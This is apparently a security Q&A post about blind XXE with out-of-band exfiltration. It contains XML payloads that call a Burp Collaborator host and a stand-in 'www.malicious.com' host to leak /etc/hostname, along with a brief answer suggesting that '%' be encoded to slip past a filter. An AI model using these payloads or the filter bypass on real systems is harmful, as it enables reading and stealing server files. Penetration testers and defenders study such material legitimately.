# XXE with OOB data exfiltration

Tags: xml, xxe, exfiltration

**SCENARIO:**

I successfully tried to send a request to the burp collaborator, then the application is vulnerable to SSRF through blind XXE. The payload I used is the following

```
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [  <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]> 
<xxx>&xxe;</xxx>
```

If I use XML entities (**% xxe**) like this

```
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE % xxe [  <!ENTITY xxe SYSTEM "http://{burp_url}.burpcollaborator.net"> ]> 
<xxx>%xxe;</xxx>
```

the payload doesn't work. So I suppose XML parameter entities or the % sign are filtered.

**GOAL:**

As the next step I want to exfiltrate `/etc/hostname` from the web application. The  payload I found is the following:

```
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "file:///etc/hostname" >
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
]
>
<foo>&callhome;</foo>
```

....which uses XML parameter entities (**%**). How can I modify the payload to avoid the use of **%**. Is removing the **%** enough to have a syntactically correct payload?

Answer (score -1):

A lot depends on the application's XML parser. However try encoding % by using `&#37;`